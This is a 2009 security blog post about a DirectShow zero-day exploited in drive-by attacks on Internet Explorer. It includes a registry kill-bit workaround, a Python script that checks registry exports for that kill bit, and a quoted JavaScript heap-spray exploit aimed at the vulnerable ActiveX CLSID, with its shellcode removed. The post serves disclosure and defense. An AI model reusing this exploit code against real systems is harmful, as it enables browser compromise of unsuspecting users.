Microsoft Browser Attacked Again!

Perhaps the reason those Microsoft ads showing the barfing were pulled is that some users were barfing when they found out how they were being attacked when using Internet Exploited.

According to the Internet Storm Center, Microsoft Internet Explorer can be zapped hard by a new attack showing up in drive-by fashion.

0-day in Microsoft DirectShow (msvidctl.dll) used in drive-by attacks


Published: 2009-07-06,
Last Updated: 2009-07-06 08:56:55 UTC
by Stephen Hall (Version: 1)

A 0-day exploit within the msVidCtl component of Microsoft DirectShow is actively being exploited through drive-by attacks using thousands of newly compromised web sites, according to CSIS. The code has been published in the public domain via a number of Chinese web sites.

Please keep a watchful eye on your AV and IDS/IPS vendors' updates to ensure coverage as early as possible on this exploit, as it is likely to be widely deployed with the code being available.

A valid workaround for the attack vector is available, which sets the kill bit on the vulnerable DLL.

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}]
"Compatibility Flags"=dword:00000400

So, if you are comfortable doing some registry editing, your temporary fix is above; otherwise, using another browser would be best. (Remember to change the default browser, so that clicking on a hyperlink in another application doesn't get you into trouble!)
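To confirm the workaround actually took effect, the following added example (not part of the ISC diary or the original post) audits the text of a registry export for the kill bit on the CLSID above. The function names and the sample export are constructed for illustration; the second sample key reflects the 32-bit registry view under Wow6432Node that 32-bit Internet Explorer reads on 64-bit Windows, which the workaround as written does not touch.

```python
import re

KILL_BIT = 0x00000400  # value the workaround writes to "Compatibility Flags"
CLSID = "{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}"  # CLSID from the workaround

FLAGS_RE = re.compile(r'"Compatibility Flags"\s*=\s*dword:([0-9a-f]{8})', re.I)

def killbit_status(reg_text, clsid=CLSID):
    """Map every ActiveX Compatibility key for `clsid` found in a .reg export
    to True (kill bit set) or False (key present, bit clear or value absent)."""
    suffix = "\\internet explorer\\activex compatibility\\" + clsid.lower()
    status, current = {}, None
    for raw in reg_text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            # Track only sections that belong to the CLSID being audited.
            current = key if key.lower().endswith(suffix) else None
            if current:
                status[current] = False
            continue
        match = FLAGS_RE.fullmatch(line) if current else None
        if match:
            # Other flag bits may be set too, so test the bit, not equality.
            status[current] = bool(int(match.group(1), 16) & KILL_BIT)
    return status

def is_protected(reg_text, clsid=CLSID):
    """True only if at least one key exists and every one has the kill bit."""
    status = killbit_status(reg_text, clsid)
    return bool(status) and all(status.values())

# Constructed sample export: native view patched, 32-bit view not patched.
SAMPLE = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}]
"Compatibility Flags"=dword:00800400

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}]
"Compatibility Flags"=dword:00000000
"""

if __name__ == "__main__":
    for key, ok in killbit_status(SAMPLE).items():
        print("SET  " if ok else "CLEAR", key)
    print("protected:", is_protected(SAMPLE))
```

Files written by regedit's export are UTF-16, so decode them before passing the text in.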

Details of the exploit are available on the CSIS web site, but are included below:

var appllaa='0';
var nndx='%'+'u9'+'0'+'9'+'0'+'%u'+'9'+'0'+'9'+appllaa;

[SHELL CODE REMOVED]

var headersize=20;
var omybro=unescape(nndx);
var slackspace=headersize+dashell.length;
while(omybro.length<slackspace)
    omybro+=omybro;
bZmybr=omybro.substring(0,slackspace);
shuishiMVP=omybro.substring(0,omybro.length-slackspace);
while(shuishiMVP.length+slackspace<0x30000)
    shuishiMVP=shuishiMVP+shuishiMVP+bZmybr;
memory=new Array();
for(x=0;x<300;x++)
    memory[x]=shuishiMVP+dashell;
var myObject=document.createElement('object');
DivID.appendChild(myObject);
myObject.width='1';
myObject.height='1';
myObject.data='./logo.gif';
myObject.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';

Microsoft has had more time with browsers than anyone except for Opera, as all the others started after Internet Explorer was first developed (lifted from Mosaic). You'd think they would get it right.

Well, better safe than sorry. You know my recommendation, it’s found at the link below.

§

Get a faster browser, download Opera
